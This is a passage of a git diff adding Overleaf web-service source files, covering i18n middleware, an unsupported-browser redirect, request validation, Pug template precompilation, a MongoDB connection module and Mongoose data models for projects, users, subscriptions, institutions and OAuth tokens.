{}).forEach(function (spec) { + availableLanguageCodes.push(spec.lngCode) + // prebuild a host->lngCode mapping for the usage at runtime in the + // middleware + availableHosts.set(new URL(spec.url).host, spec.lngCode) + + // prebuild a lngCode -> language config mapping; some subdomains should + // not appear in the language picker + if 
(!spec.hide) {
+    subdomainConfigs.set(spec.lngCode, spec)
+  }
+})
+if (!availableLanguageCodes.includes(fallbackLanguageCode)) {
+  // always load the fallback locale
+  availableLanguageCodes.push(fallbackLanguageCode)
+}
+
+// The "node --watch" flag is not easy to detect.
+if (process.argv.includes('--watch-locales')) {
+  // Dummy imports for setting up watching of locales files.
+  for (const lngCode of availableLanguageCodes) {
+    require(`../../../locales/${lngCode}.json`)
+  }
+}
+
+i18n
+  .use(fsBackend)
+  .use(middleware.LanguageDetector)
+  .init({
+    backend: {
+      loadPath: path.join(__dirname, '../../../locales/__lng__.json'),
+    },
+
+    // still using the v3 plural suffixes
+    compatibilityJSON: 'v3',
+
+    // Load translation files synchronously: https://www.i18next.com/overview/configuration-options#initimmediate
+    initImmediate: false,
+
+    // We use the legacy v1 JSON format, so configure interpolator to use
+    // underscores instead of curly braces
+    interpolation: {
+      prefix: '__',
+      suffix: '__',
+      unescapeSuffix: 'HTML',
+      // Disable escaping of interpolated values for backwards compatibility.
+      // We escape the value after it's translated in web, so there's no
+      // security risk
+      escapeValue: Settings.i18n.escapeHTMLInVars,
+      // Disable nesting in interpolated values, preventing user input
+      // injection via another nested value
+      skipOnVariables: true,
+
+      defaultVariables: {
+        appName: Settings.appName,
+      },
+    },
+
+    preload: availableLanguageCodes,
+    supportedLngs: availableLanguageCodes,
+    fallbackLng: fallbackLanguageCode,
+  })
+  .catch(err => {
+    logger.error({ err }, 'failed to initialize i18next library')
+  })
+
+// Make a custom language detector for the Accept-Language header
+const headerLangDetector = new middleware.LanguageDetector(i18n.services, {
+  order: ['header'],
+})
+
+function setLangBasedOnDomainMiddleware(req, res, next) {
+  // Determine language from subdomain
+  const lang = availableHosts.get(req.headers.host)
+  if (lang) {
+    req.i18n.changeLanguage(lang)
+  }
+
+  // expose the language code to pug
+  res.locals.currentLngCode = req.language
+
+  // If the set language is different from the language detection (based on
+  // the Accept-Language header), then set a flag which will show a banner
+  // offering to switch to the appropriate language subdomain
+  const detectedLanguageCode = headerLangDetector.detect(req, res)
+  if (req.language !== detectedLanguageCode) {
+    res.locals.suggestedLanguageSubdomainConfig =
+      subdomainConfigs.get(detectedLanguageCode)
+  }
+
+  // Decorate req.i18n with a translate alias for backwards-compatible usage
+  // in requests
+  req.i18n.translate = (key, vars, components) => {
+    vars = vars || {}
+
+    if (Settings.i18n.checkForHTMLInVars) {
+      Object.entries(vars).forEach(([field, value]) => {
+        if (pug.escape(value) !== value) {
+          const violationsKey = key + field
+          // do not flood the logs, log one sample per pod + key + field
+          if (!I18N_HTML_INJECTIONS.has(violationsKey)) {
+            logger.warn(
+              { key, field, value },
+              'html content in translations context vars'
+            )
+            I18N_HTML_INJECTIONS.add(violationsKey)
+          }
+        }
+      })
+    }
+
+    const locale = req.i18n.t(key, vars)
+    if (components) {
+      return SafeHTMLSubstitution.render(locale, components)
+    } else {
+      return locale
+    }
+  }
+
+  next()
+}
+
+// Decorate i18n with a translate alias for backwards compatibility in
+// direct usage
+i18n.translate = i18n.t
+
+module.exports = {
+  i18nMiddleware: middleware.handle(i18n),
+  setLangBasedOnDomainMiddleware,
+  i18n,
+}
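A usage sketch for the request-level `translate` helper above (editor's illustration; the key and route are hypothetical):

    // Hypothetical handler relying on the i18n middleware exported above.
    // Placeholders in locale strings use the legacy __var__ delimiters.
    app.get('/greeting', (req, res) => {
      // e.g. locales/en.json: { "user_greeting": "Welcome back, __name__!" }
      res.send(req.i18n.translate('user_greeting', { name: 'Ada' }))
    })

diff --git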
a/services/web/app/src/infrastructure/UnsupportedBrowserMiddleware.js b/services/web/app/src/infrastructure/UnsupportedBrowserMiddleware.js new file mode 100644 index 0000000..c145c9f --- /dev/null +++ b/services/web/app/src/infrastructure/UnsupportedBrowserMiddleware.js @@ -0,0 +1,50 @@ +const Bowser = require('bowser') +const Settings = require('@overleaf/settings') +const Url = require('url') +const { getSafeRedirectPath } = require('../Features/Helpers/UrlHelper') + +function unsupportedBrowserMiddleware(req, res, next) { + if (!Settings.unsupportedBrowsers) return next() + + // Prevent redirect loop + const path = req.path + if (path === '/unsupported-browser') return next() + + const userAgent = req.headers['user-agent'] + + if (!userAgent) return next() + + const parser = Bowser.getParser(userAgent) + + // Allow bots through by only ignoring bots or unrecognised UA strings + const isBot = parser.isPlatform('bot') || !parser.getBrowserName() + if (isBot) return next() + + const isUnsupported = parser.satisfies(Settings.unsupportedBrowsers) + if (isUnsupported) { + return res.redirect( + Url.format({ + pathname: '/unsupported-browser', + query: { fromURL: req.originalUrl }, + }) + ) + } + + next() +} + +function renderUnsupportedBrowserPage(req, res) { + let fromURL + if (typeof req.query.fromURL === 'string') { + try { + fromURL = + Settings.siteUrl + (getSafeRedirectPath(req.query.fromURL) || '/') + } catch (e) {} + } + res.render('general/unsupported-browser', { fromURL }) +} + +module.exports = { + renderUnsupportedBrowserPage, + unsupportedBrowserMiddleware, +} diff --git a/services/web/app/src/infrastructure/Validation.js b/services/web/app/src/infrastructure/Validation.js new file mode 100644 index 0000000..eafb82c --- /dev/null +++ b/services/web/app/src/infrastructure/Validation.js @@ -0,0 +1,34 @@ +const { Joi: CelebrateJoi, celebrate, errors } = require('celebrate') +const { ObjectId } = require('mongodb-legacy') + +const objectIdValidator = { + type: 'objectId', + base: CelebrateJoi.any(), + messages: { + 'objectId.invalid': 'needs to be a valid ObjectId', + }, + coerce(value) { + return { + value: typeof value === typeof ObjectId ? 
value : new ObjectId(value), + } + }, + prepare(value, helpers) { + if (!ObjectId.isValid(value)) { + return { + errors: helpers.error('objectId.invalid'), + } + } + }, +} + +const Joi = CelebrateJoi.extend(objectIdValidator) +const errorMiddleware = errors() + +module.exports = { Joi, validate, errorMiddleware } + +/** + * Validation middleware + */ +function validate(schema) { + return celebrate(schema, { allowUnknown: true }) +} diff --git a/services/web/app/src/infrastructure/Views.js b/services/web/app/src/infrastructure/Views.js new file mode 100644 index 0000000..fc60eb8 --- /dev/null +++ b/services/web/app/src/infrastructure/Views.js @@ -0,0 +1,212 @@ +const logger = require('@overleaf/logger') +const pug = require('pug') +const globby = require('globby') +const Settings = require('@overleaf/settings') +const fs = require('fs') +const Path = require('path') + +// Generate list of view names from app/views +function buildViewList() { + return globby + .sync('app/views/**/*.pug', { + onlyFiles: true, + concurrency: 1, + ignore: [ + // Ignore includes + '**/_*.pug', + '**/_*/**', + // Ignore shared layout files + 'app/views/layout*', + 'app/views/layout/*', + ], + }) + .concat( + globby.sync('modules/*/app/views/**/*.pug', { + onlyFiles: true, + concurrency: 1, + // Ignore includes + ignore: ['**/_*.pug', '**/_*/**'], + }) + ) + .concat(Object.values(Settings.viewIncludes).flat()) + .map(x => Path.resolve(x)) +} + +const PUG_COMPILE_ARGUMENTS = { + doctype: 'html', + cache: true, + compileDebug: Settings.debugPugTemplates, + inlineRuntimeFunctions: false, + module: true, +} + +/** + * @param {string} compiled + * @return {{duplicates: Array<string>, found: Array<string>}} + * @private + */ +function _findAllMetaTags(compiled) { + const inString = /name=(\\?["'`])(ol-.+?)\1/g + const asExpression = /pug\.attr\("name",\s*(["'`])(ol-.+?)\1/g + + const found = new Set() + const duplicates = new Set() + for (const regex of [inString, asExpression]) { + for (const [, , name] of compiled.matchAll(regex)) { + if (found.has(name)) duplicates.add(name) + found.add(name) + } + } + // Special case: Ignore the loop for adding permissions meta tags. + duplicates.delete('ol-cannot-') + return { found: Array.from(found), duplicates: Array.from(duplicates) } +} + +/** + * @param {string} filePath + * @param {string} firstLine + * @return {boolean} + * @private + */ +function _expectMetaFor(filePath, firstLine) { + // no-js pages have no use for ol-meta tags + if (firstLine.match(/extends .*layout\/layout-no-js/)) return false + // plain html pages have no use for ol-meta tags + if (firstLine === 'doctype html') return false + // xml pages do not use meta tags + if (firstLine === 'doctype xml') return false + // view includes should not add meta tags as we cannot trace these easily. 
+  if (Object.values(Settings.viewIncludes).flat().includes(filePath)) {
+    if (
+      filePath === Path.resolve('modules/writefull/app/views/_editor_meta.pug')
+    ) {
+      // Special case: The Writefull module adds meta tags to editor, see inline comment there
+      return true
+    }
+    // default case: no meta tags
+    return false
+  }
+  // default to expect meta tags in top-level templates
+  return true
+}
+
+/**
+ * @param {string} filePath
+ * @param {string} compiled
+ */
+function checkForDuplicateMeta(filePath, compiled) {
+  const { found, duplicates } = _findAllMetaTags(compiled)
+
+  if (duplicates.length !== 0) {
+    throw new Error(
+      `Found duplicate meta tags in ${filePath} (or its imports): ${Array.from(duplicates)}`
+    )
+  }
+  const firstLine = fs.readFileSync(filePath, 'utf-8').split('\n', 1)[0]
+  const expectMeta = _expectMetaFor(filePath, firstLine)
+  if (found.length === 0 && expectMeta) {
+    throw new Error(
+      `Expected to find meta entries in ${filePath} (or its imports)`
+    )
+  }
+  if (!expectMeta && found.length !== 0) {
+    throw new Error(
+      `Expected to find no meta entries in plain html or 'viewIncludes'. Found ${Array.from(found)} in ${filePath} (or its imports)`
+    )
+  }
+}
+
+function precompileViewsAndCacheToDisk() {
+  const startTime = Date.now()
+  let success = 0
+  let precompiled = 0
+  for (const filePath of buildViewList()) {
+    const precompiledFilename = filePath.replace(/\.pug$/, '.js')
+    try {
+      const compiled = pug.compileFileClient(filePath, PUG_COMPILE_ARGUMENTS)
+      try {
+        if (fs.readFileSync(precompiledFilename, 'utf-8') === compiled) {
+          precompiled++
+          continue
+        }
+      } catch {}
+      checkForDuplicateMeta(filePath, compiled)
+      fs.writeFileSync(precompiledFilename, compiled, {
+        encoding: 'utf-8',
+        mode: 0o644,
+      })
+      success++
+    } catch (err) {
+      logger.err({ err, filePath }, 'failed to precompile pug template')
+      throw err
+    }
+  }
+  logger.info(
+    { timeTaken: Date.now() - startTime, success, precompiled },
+    'compiled pug templates'
+  )
+}
+
+module.exports = {
+  // for tests
+  PUG_COMPILE_ARGUMENTS,
+  _expectMetaFor,
+  _findAllMetaTags,
+
+  compileViewIncludes(app) {
+    const viewIncludes = {}
+    for (const [view, paths] of Object.entries(Settings.viewIncludes)) {
+      viewIncludes[view] = []
+      for (const filePath of paths) {
+        viewIncludes[view].push(
+          pug.compileFile(filePath, {
+            ...PUG_COMPILE_ARGUMENTS,
+            cache: app.enabled('view cache'),
+          })
+        )
+      }
+    }
+    return viewIncludes
+  },
+
+  precompileViews(app) {
+    const startTime = Date.now()
+    let success = 0
+    let precompiled = 0
+    let failures = 0
+    for (const filePath of buildViewList()) {
+      const precompiledFilename = filePath.replace(/\.pug$/, '.js')
+      if (fs.existsSync(precompiledFilename)) {
+        logger.debug({ filePath }, 'loading precompiled pug template')
+        try {
+          pug.cache[filePath] = require(precompiledFilename)
+          precompiled++
+          continue
+        } catch (err) {
+          logger.error(
+            { filePath, err },
+            'error loading precompiled pug template'
+          )
+          failures++
+        }
+      }
+      try {
+        logger.warn({ filePath }, 'compiling pug template at boot time')
+        pug.compileFile(filePath, PUG_COMPILE_ARGUMENTS)
+        success++
+      } catch (err) {
+        logger.error({ filePath, err }, 'error compiling pug template')
+        failures++
+      }
+    }
+    logger.debug(
+      { timeTaken: Date.now() - startTime, failures, success, precompiled },
+      'compiled pug templates'
+    )
+  },
+}
+
+if (require.main === module) {
+  precompileViewsAndCacheToDisk()
+  process.exit(0)
+}
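Stepping back to Validation.js above, a sketch of how the extended Joi and the `validate` wrapper are meant to combine (editor's illustration; the route, schema, and handler names are hypothetical):

    const { Joi, validate, errorMiddleware } = require('./Validation')

    webRouter.post(
      '/project/:projectId/rename', // invented endpoint
      validate({
        // Joi.objectId() comes from the custom extension: it rejects
        // malformed ids and coerces valid hex strings to ObjectId instances.
        params: Joi.object({ projectId: Joi.objectId().required() }),
        body: Joi.object({ name: Joi.string().max(150).required() }),
      }),
      renameProject // invented handler
    )
    // celebrate's errors() middleware turns validation failures into 400s
    webRouter.use(errorMiddleware)

diff --git a/services/web/app/src/infrastructure/mongodb.js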
b/services/web/app/src/infrastructure/mongodb.js new file mode 100644 index 0000000..aa7aa4a --- /dev/null +++ b/services/web/app/src/infrastructure/mongodb.js @@ -0,0 +1,143 @@ +const mongodb = require('mongodb-legacy') +const OError = require('@overleaf/o-error') +const Settings = require('@overleaf/settings') +const Mongoose = require('./Mongoose') +const { addConnectionDrainer } = require('./GracefulShutdown') + +// Ensure Mongoose is using the same mongodb instance as the mongodb module, +// otherwise we will get multiple versions of the ObjectId class. Mongoose +// patches ObjectId, so loading multiple versions of the mongodb module can +// cause problems with ObjectId comparisons. +if (Mongoose.mongo.ObjectId !== mongodb.ObjectId) { + throw new OError( + 'FATAL ERROR: Mongoose is using a different mongodb instance' + ) +} + +const { ObjectId, ReadPreference } = mongodb + +const READ_PREFERENCE_PRIMARY = ReadPreference.primary.mode +const READ_PREFERENCE_SECONDARY = Settings.mongo.hasSecondaries + ? ReadPreference.secondary.mode + : ReadPreference.secondaryPreferred.mode + +const mongoClient = new mongodb.MongoClient( + Settings.mongo.url, + Settings.mongo.options +) + +addConnectionDrainer('mongodb', async () => { + await mongoClient.close() +}) + +const internalDb = mongoClient.db() +const db = { + contacts: internalDb.collection('contacts'), + deletedFiles: internalDb.collection('deletedFiles'), + deletedProjects: internalDb.collection('deletedProjects'), + deletedSubscriptions: internalDb.collection('deletedSubscriptions'), + deletedUsers: internalDb.collection('deletedUsers'), + dropboxEntities: internalDb.collection('dropboxEntities'), + dropboxProjects: internalDb.collection('dropboxProjects'), + docHistory: internalDb.collection('docHistory'), + docHistoryIndex: internalDb.collection('docHistoryIndex'), + docSnapshots: internalDb.collection('docSnapshots'), + docs: internalDb.collection('docs'), + feedbacks: internalDb.collection('feedbacks'), + githubSyncEntityVersions: internalDb.collection('githubSyncEntityVersions'), + githubSyncProjectStates: internalDb.collection('githubSyncProjectStates'), + githubSyncUserCredentials: internalDb.collection('githubSyncUserCredentials'), + globalMetrics: internalDb.collection('globalMetrics'), + grouppolicies: internalDb.collection('grouppolicies'), + institutions: internalDb.collection('institutions'), + messages: internalDb.collection('messages'), + migrations: internalDb.collection('migrations'), + notifications: internalDb.collection('notifications'), + oauthAccessTokens: internalDb.collection('oauthAccessTokens'), + oauthApplications: internalDb.collection('oauthApplications'), + oauthAuthorizationCodes: internalDb.collection('oauthAuthorizationCodes'), + projectAuditLogEntries: internalDb.collection('projectAuditLogEntries'), + projectHistoryChunks: internalDb.collection('projectHistoryChunks'), + projectHistoryFailures: internalDb.collection('projectHistoryFailures'), + projectHistoryGlobalBlobs: internalDb.collection('projectHistoryGlobalBlobs'), + projectHistoryLabels: internalDb.collection('projectHistoryLabels'), + projectHistoryMetaData: internalDb.collection('projectHistoryMetaData'), + projectHistorySyncState: internalDb.collection('projectHistorySyncState'), + projectInvites: internalDb.collection('projectInvites'), + projects: internalDb.collection('projects'), + publishers: internalDb.collection('publishers'), + rooms: internalDb.collection('rooms'), + samlCache: internalDb.collection('samlCache'), + samlLogs: 
internalDb.collection('samlLogs'), + spellingPreferences: internalDb.collection('spellingPreferences'), + splittests: internalDb.collection('splittests'), + ssoConfigs: internalDb.collection('ssoConfigs'), + subscriptions: internalDb.collection('subscriptions'), + surveys: internalDb.collection('surveys'), + systemmessages: internalDb.collection('systemmessages'), + tags: internalDb.collection('tags'), + teamInvites: internalDb.collection('teamInvites'), + tokens: internalDb.collection('tokens'), + userAuditLogEntries: internalDb.collection('userAuditLogEntries'), + users: internalDb.collection('users'), + onboardingDataCollection: internalDb.collection('onboardingDataCollection'), + scriptLogs: internalDb.collection('scriptLogs'), +} + +const connectionPromise = mongoClient.connect() + +async function getCollectionNames() { + const internalDb = mongoClient.db() + + const collections = await internalDb.collections() + return collections.map(collection => collection.collectionName) +} + +async function cleanupTestDatabase() { + ensureTestDatabase() + const collectionNames = await getCollectionNames() + const collections = [] + for (const name of collectionNames) { + if (name in db && name !== 'migrations') { + collections.push(db[name]) + } + } + await Promise.all(collections.map(coll => coll.deleteMany({}))) +} + +async function dropTestDatabase() { + ensureTestDatabase() + await mongoClient.db().dropDatabase() +} + +function ensureTestDatabase() { + const internalDb = mongoClient.db() + const dbName = internalDb.databaseName + const env = process.env.NODE_ENV + + if (dbName !== 'test-overleaf' || env !== 'test') { + throw new OError( + `Refusing to clear database '${dbName}' in environment '${env}'` + ) + } +} + +/** + * WARNING: Consider using a pre-populated collection from `db` to avoid typos! 
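+ *
+ * Editor's sketch (illustrative, not part of the commit): typical callers go
+ * through the pre-populated `db` map rather than this helper, e.g.
+ *
+ *   const { db, ObjectId } = require('./mongodb')
+ *   const user = await db.users.findOne(
+ *     { _id: new ObjectId(userId) }, // userId: a 24-char hex string
+ *     { projection: { email: 1 } }
+ *   )
+ *
+ * getCollectionInternal() is for collections not listed in `db` above.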
+ */ +async function getCollectionInternal(name) { + const internalDb = mongoClient.db() + return internalDb.collection(name) +} + +module.exports = { + db, + ObjectId, + connectionPromise, + getCollectionNames, + getCollectionInternal, + cleanupTestDatabase, + dropTestDatabase, + READ_PREFERENCE_PRIMARY, + READ_PREFERENCE_SECONDARY, +} diff --git a/services/web/app/src/infrastructure/types.ts b/services/web/app/src/infrastructure/types.ts new file mode 100644 index 0000000..3fc3275 --- /dev/null +++ b/services/web/app/src/infrastructure/types.ts @@ -0,0 +1,8 @@ +export interface HttpPermissionsPolicyRule { + [key: string]: string +} + +export interface HttpPermissionsPolicy { + blocked: [string] + allowed: HttpPermissionsPolicyRule +} diff --git a/services/web/app/src/models/DeletedFile.js b/services/web/app/src/models/DeletedFile.js new file mode 100644 index 0000000..45d30d8 --- /dev/null +++ b/services/web/app/src/models/DeletedFile.js @@ -0,0 +1,21 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const DeletedFileSchema = new Schema( + { + name: String, + projectId: Schema.ObjectId, + created: { + type: Date, + }, + linkedFileData: { type: Schema.Types.Mixed }, + hash: { + type: String, + }, + deletedAt: { type: Date }, + }, + { collection: 'deletedFiles', minimize: false } +) + +exports.DeletedFile = mongoose.model('DeletedFile', DeletedFileSchema) +exports.DeletedFileSchema = DeletedFileSchema diff --git a/services/web/app/src/models/DeletedProject.js b/services/web/app/src/models/DeletedProject.js new file mode 100644 index 0000000..c1f6ce9 --- /dev/null +++ b/services/web/app/src/models/DeletedProject.js @@ -0,0 +1,34 @@ +const mongoose = require('../infrastructure/Mongoose') +const { ProjectSchema } = require('./Project') + +const { Schema } = mongoose +const { ObjectId } = Schema + +const DeleterDataSchema = new Schema({ + deleterId: { type: ObjectId, ref: 'User' }, + deleterIpAddress: { type: String }, + deletedAt: { type: Date }, + deletedProjectId: { type: ObjectId }, + deletedProjectOwnerId: { type: ObjectId, ref: 'User' }, + deletedProjectCollaboratorIds: [{ type: ObjectId, ref: 'User' }], + deletedProjectReadOnlyIds: [{ type: ObjectId, ref: 'User' }], + deletedProjectReviewerIds: [{ type: ObjectId, ref: 'User' }], + deletedProjectReadWriteTokenAccessIds: [{ type: ObjectId, ref: 'User' }], + deletedProjectReadOnlyTokenAccessIds: [{ type: ObjectId, ref: 'User' }], + deletedProjectReadWriteToken: { type: String }, + deletedProjectReadOnlyToken: { type: String }, + deletedProjectLastUpdatedAt: { type: Date }, + deletedProjectOverleafId: { type: Number }, + deletedProjectOverleafHistoryId: { type: Schema.Types.Mixed }, +}) + +const DeletedProjectSchema = new Schema( + { + deleterData: DeleterDataSchema, + project: ProjectSchema, + }, + { collection: 'deletedProjects', minimize: false } +) + +exports.DeletedProject = mongoose.model('DeletedProject', DeletedProjectSchema) +exports.DeletedProjectSchema = DeletedProjectSchema diff --git a/services/web/app/src/models/DeletedSubscription.js b/services/web/app/src/models/DeletedSubscription.js new file mode 100644 index 0000000..10b649d --- /dev/null +++ b/services/web/app/src/models/DeletedSubscription.js @@ -0,0 +1,34 @@ +const mongoose = require('../infrastructure/Mongoose') +const { SubscriptionSchema } = require('./Subscription') + +const { Schema } = mongoose +const { ObjectId } = Schema + +const DeleterDataSchema = new Schema( + { + deleterId: { type: ObjectId, ref: 'User' }, + 
deleterIpAddress: { type: String }, + deletedAt: { + type: Date, + default() { + return new Date() + }, + }, + }, + { _id: false } +) + +const DeletedSubscriptionSchema = new Schema( + { + deleterData: DeleterDataSchema, + subscription: SubscriptionSchema, + }, + { collection: 'deletedSubscriptions', minimize: false } +) + +exports.DeletedSubscription = mongoose.model( + 'DeletedSubscription', + DeletedSubscriptionSchema +) + +exports.DeletedSubscriptionSchema = DeletedSubscriptionSchema diff --git a/services/web/app/src/models/DeletedUser.js b/services/web/app/src/models/DeletedUser.js new file mode 100644 index 0000000..5d20f9b --- /dev/null +++ b/services/web/app/src/models/DeletedUser.js @@ -0,0 +1,31 @@ +const mongoose = require('../infrastructure/Mongoose') +const { UserSchema } = require('./User') + +const { Schema } = mongoose +const { ObjectId } = Schema + +const DeleterDataSchema = new Schema({ + deleterId: { type: ObjectId, ref: 'User' }, + deleterIpAddress: { type: String }, + deletedAt: { type: Date }, + deletedUserId: { type: ObjectId }, + deletedUserLastLoggedIn: { type: Date }, + deletedUserSignUpDate: { type: Date }, + deletedUserLoginCount: { type: Number }, + deletedUserReferralId: { type: String }, + deletedUserReferredUsers: [{ type: ObjectId, ref: 'User' }], + deletedUserReferredUserCount: { type: Number }, + deletedUserOverleafId: { type: Number }, +}) + +const DeletedUserSchema = new Schema( + { + deleterData: DeleterDataSchema, + user: UserSchema, + }, + { collection: 'deletedUsers', minimize: false } +) + +exports.DeletedUser = mongoose.model('DeletedUser', DeletedUserSchema) + +exports.DeletedUserSchema = DeletedUserSchema diff --git a/services/web/app/src/models/Doc.js b/services/web/app/src/models/Doc.js new file mode 100644 index 0000000..9f38ac0 --- /dev/null +++ b/services/web/app/src/models/Doc.js @@ -0,0 +1,14 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const DocSchema = new Schema( + { + name: { type: String, default: 'new doc' }, + }, + { minimize: false } +) + +exports.Doc = mongoose.model('Doc', DocSchema) + +exports.DocSchema = DocSchema diff --git a/services/web/app/src/models/DocSnapshot.js b/services/web/app/src/models/DocSnapshot.js new file mode 100644 index 0000000..b851d4a --- /dev/null +++ b/services/web/app/src/models/DocSnapshot.js @@ -0,0 +1,18 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const DocSnapshotSchema = new Schema( + { + project_id: Schema.Types.ObjectId, + doc_id: Schema.Types.ObjectId, + version: Number, + lines: [String], + pathname: String, + ranges: Schema.Types.Mixed, + ts: Date, + }, + { collection: 'docSnapshots', minimize: false } +) + +exports.DocSnapshot = mongoose.model('DocSnapshot', DocSnapshotSchema) diff --git a/services/web/app/src/models/Feedback.js b/services/web/app/src/models/Feedback.js new file mode 100644 index 0000000..8b63821 --- /dev/null +++ b/services/web/app/src/models/Feedback.js @@ -0,0 +1,24 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose +const { ObjectId } = Schema + +const FeedbackSchema = new Schema( + { + userId: { + type: ObjectId, + ref: 'User', + }, + source: String, + createdAt: { + type: Date, + default() { + return new Date() + }, + }, + data: {}, + }, + { minimize: false } +) + +exports.Feedback = mongoose.model('Feedback', FeedbackSchema) +exports.FeedbackSchema = FeedbackSchema diff --git a/services/web/app/src/models/File.js 
b/services/web/app/src/models/File.js new file mode 100644 index 0000000..5a7c772 --- /dev/null +++ b/services/web/app/src/models/File.js @@ -0,0 +1,27 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const FileSchema = new Schema( + { + name: { + type: String, + default: '', + }, + created: { + type: Date, + default() { + return new Date() + }, + }, + rev: { type: Number, default: 0 }, + linkedFileData: { type: Schema.Types.Mixed }, + hash: { + type: String, + }, + }, + { minimize: false } +) + +exports.File = mongoose.model('File', FileSchema) +exports.FileSchema = FileSchema diff --git a/services/web/app/src/models/Folder.js b/services/web/app/src/models/Folder.js new file mode 100644 index 0000000..52312e9 --- /dev/null +++ b/services/web/app/src/models/Folder.js @@ -0,0 +1,21 @@ +const mongoose = require('../infrastructure/Mongoose') +const { DocSchema } = require('./Doc') +const { FileSchema } = require('./File') + +const { Schema } = mongoose + +const FolderSchema = new Schema( + { + name: { type: String, default: 'new folder' }, + }, + { minimize: false } +) + +FolderSchema.add({ + docs: [DocSchema], + fileRefs: [FileSchema], + folders: [FolderSchema], +}) + +exports.Folder = mongoose.model('Folder', FolderSchema) +exports.FolderSchema = FolderSchema diff --git a/services/web/app/src/models/GlobalMetric.js b/services/web/app/src/models/GlobalMetric.js new file mode 100644 index 0000000..824c147 --- /dev/null +++ b/services/web/app/src/models/GlobalMetric.js @@ -0,0 +1,19 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const GlobalMetricSchema = new Schema( + { + _id: { type: String, required: true }, + value: { + type: Number, + default: 0, + }, + }, + { + collection: 'globalMetrics', + minimize: false, + } +) + +exports.GlobalMetric = mongoose.model('GlobalMetric', GlobalMetricSchema) +exports.GlobalMetricSchema = GlobalMetricSchema diff --git a/services/web/app/src/models/GroupPolicy.js b/services/web/app/src/models/GroupPolicy.js new file mode 100644 index 0000000..e975834 --- /dev/null +++ b/services/web/app/src/models/GroupPolicy.js @@ -0,0 +1,35 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const GroupPolicySchema = new Schema( + { + // User can't delete their own account + userCannotDeleteOwnAccount: Boolean, + + // User can't add a secondary email address, or affiliation + userCannotHaveSecondaryEmail: Boolean, + + // User can't have an active (currently auto-renewing) personal subscription, nor can they start one + userCannotHaveSubscription: Boolean, + + // User can't choose to leave the group subscription they are managed by + userCannotLeaveManagingGroupSubscription: Boolean, + + // User can't have a Google SSO account, nor can they link it to their account + userCannotHaveGoogleSSO: Boolean, + + // User can't have other third-party SSO (e.g. 
ORCID/IEEE) active on their account, nor can they link it to their account + userCannotHaveOtherThirdPartySSO: Boolean, + + // User can't use any of our AI features, such as the compile-assistant + userCannotUseAIFeatures: Boolean, + + // User can't use the chat feature + userCannotUseChat: Boolean, + }, + { minimize: false } +) + +exports.GroupPolicy = mongoose.model('GroupPolicy', GroupPolicySchema) +exports.GroupPolicySchema = GroupPolicySchema diff --git a/services/web/app/src/models/Institution.js b/services/web/app/src/models/Institution.js new file mode 100644 index 0000000..fd18cf3 --- /dev/null +++ b/services/web/app/src/models/Institution.js @@ -0,0 +1,49 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose +const { ObjectId } = Schema +const settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const { promisify } = require('@overleaf/promise-utils') +const { fetchJson } = require('@overleaf/fetch-utils') + +const InstitutionSchema = new Schema( + { + v1Id: { type: Number, required: true }, + managerIds: [{ type: ObjectId, ref: 'User' }], + metricsEmail: { + optedOutUserIds: [{ type: ObjectId, ref: 'User' }], + lastSent: { type: Date }, + }, + groupPolicy: { type: ObjectId, ref: 'GroupPolicy' }, + }, + { minimize: false } +) + +// fetch institution's data from v1 API. Errors are ignored +InstitutionSchema.method('fetchV1Data', async function (callback) { + const url = `${settings.apis.v1.url}/universities/list/${this.v1Id}` + try { + const parsedBody = await fetchJson(url) + this.name = parsedBody != null ? parsedBody.name : undefined + this.countryCode = parsedBody != null ? parsedBody.country_code : undefined + this.departments = parsedBody != null ? parsedBody.departments : undefined + this.portalSlug = parsedBody != null ? parsedBody.portal_slug : undefined + this.enterpriseCommons = + parsedBody != null ? 
parsedBody.enterprise_commons : undefined + } catch (error) { + // log error and carry on without v1 data + logger.err( + { model: 'Institution', v1Id: this.v1Id, error }, + '[fetchV1DataError]' + ) + } + callback(null, this) +}) + +InstitutionSchema.method( + 'fetchV1DataPromise', + promisify(InstitutionSchema.methods.fetchV1Data) +) + +exports.Institution = mongoose.model('Institution', InstitutionSchema) +exports.InstitutionSchema = InstitutionSchema diff --git a/services/web/app/src/models/OauthAccessToken.js b/services/web/app/src/models/OauthAccessToken.js new file mode 100644 index 0000000..8b3dbc8 --- /dev/null +++ b/services/web/app/src/models/OauthAccessToken.js @@ -0,0 +1,32 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose +const { ObjectId } = Schema + +const OauthAccessTokenSchema = new Schema( + { + accessToken: String, + accessTokenPartial: String, + type: String, + accessTokenExpiresAt: Date, + oauthApplication_id: { type: ObjectId, ref: 'OauthApplication' }, + refreshToken: String, + refreshTokenExpiresAt: Date, + scope: String, + user_id: { type: ObjectId, ref: 'User' }, + createdAt: { type: Date }, + expiresAt: Date, + lastUsedAt: Date, + }, + { + collection: 'oauthAccessTokens', + minimize: false, + } +) + +exports.OauthAccessToken = mongoose.model( + 'OauthAccessToken', + OauthAccessTokenSchema +) + +exports.OauthAccessTokenSchema = OauthAccessTokenSchema diff --git a/services/web/app/src/models/OauthApplication.js b/services/web/app/src/models/OauthApplication.js new file mode 100644 index 0000000..f02a985 --- /dev/null +++ b/services/web/app/src/models/OauthApplication.js @@ -0,0 +1,25 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const OauthApplicationSchema = new Schema( + { + id: String, + clientSecret: String, + grants: [String], + name: String, + redirectUris: [String], + scopes: [String], + }, + { + collection: 'oauthApplications', + minimize: false, + } +) + +exports.OauthApplication = mongoose.model( + 'OauthApplication', + OauthApplicationSchema +) + +exports.OauthApplicationSchema = OauthApplicationSchema diff --git a/services/web/app/src/models/OauthAuthorizationCode.js b/services/web/app/src/models/OauthAuthorizationCode.js new file mode 100644 index 0000000..6b98223 --- /dev/null +++ b/services/web/app/src/models/OauthAuthorizationCode.js @@ -0,0 +1,28 @@ +const mongoose = 